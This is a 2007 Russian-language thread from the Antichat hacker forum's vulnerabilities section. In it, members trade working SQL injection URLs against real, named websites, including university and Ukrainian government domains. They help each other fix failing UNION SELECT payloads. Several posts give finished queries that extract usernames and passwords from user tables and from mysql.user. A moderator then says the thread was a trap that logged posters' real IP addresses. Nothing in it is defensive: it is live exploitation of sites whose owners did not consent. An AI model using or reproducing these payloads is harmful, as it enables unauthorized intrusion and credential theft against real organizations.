ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1011  
Старый 14.03.2007, 12:31
Аватар для fersa
fersa
Новичок
Регистрация: 22.02.2007
Сообщений: 15
Провел на форуме:
74971

Репутация: 0
По умолчанию

Цитата:
Сообщение от \6/  
А пример можно?
Так невыходит:
Код:
http://h44.lan248.rs/index.php?f=1&s=1'id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #1012  
Старый 14.03.2007, 12:42
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

это был не пример просто ты помоему незнаеш назначения sql inj или путаеш его с php inj
http://www.funisland.com/gamelist.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #1013  
Старый 14.03.2007, 14:50
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

Объяните пожайлуста, зачем ломать русские сайты??

Просьба к модераторам, выложить здесь ники со следующими Ip:


[censored!]

PS. Если ломаете, то хотя бы думайте головой, а не задницей.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Elekt; 14.03.2007 в 15:35..
 
Ответить с цитированием

  #1014  
Старый 14.03.2007, 15:20
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

_http://www.caucaz.com/home_eng/breve_contenu.php?id=1+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29/*

Вывод второго поля смотрим внизу, слева над WRITTEN BY
 
Ответить с цитированием

  #1015  
Старый 14.03.2007, 15:38
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Вас проверяли на основы анонимной работы в сети.
Сегодня это были наши мемберы, а завтра это могут быть ребята из органов.

Делаем выводы.

Под реальными айпи замечены: Ksander,Colkru,\6/

ЗЫ: бага, сервак и логи - настоящие. И проблемы у Вас ещё могут быть.

Последний раз редактировалось Elekt; 14.03.2007 в 15:48.. Причина: тему зря закрыл, сори
 
Ответить с цитированием

  #1016  
Старый 14.03.2007, 18:00
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+admins/*
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+users/*
поля так и несмог подобрать(

Цитата:
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+nu ll,null,null--
кто заняет как обойти несоответствие
Цитата:
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+1, 2,3--
ERROR: UNION types character varying and integer cannot be matched
 
Ответить с цитированием

  #1017  
Старый 14.03.2007, 18:03
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

VampiRUS
по идее convert(version(),char)
 
Ответить с цитированием

  #1018  
Старый 14.03.2007, 18:32
Аватар для Alexsize
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

Все топики не смотрел, так что если уже есть, сорри. Привет первонаху _http://www.gay-nn.ru/?aquery=news&id=-106+UNION+SELECT+1,2,3,4,5,6,7,8/* =)
 
Ответить с цитированием

  #1019  
Старый 14.03.2007, 18:40
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

2VampiRUS
Цитата:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+admins/*
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+users/*
да ты и таблицы не подобрал)) нужно union+select+*+from+table_name/*

вот -

Код:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
зы 16 юзеров, перебирать limit'ом

Последний раз редактировалось n0ne; 14.03.2007 в 18:46..
 
Ответить с цитированием

  #1020  
Старый 14.03.2007, 18:48
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

www.loga.gov.ua
PHP код:
http://www.loga.gov.ua/ua/news/todrug.php?id=-8809+union+select+concat(password,0x3a,user)+from+mysql.user/* 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ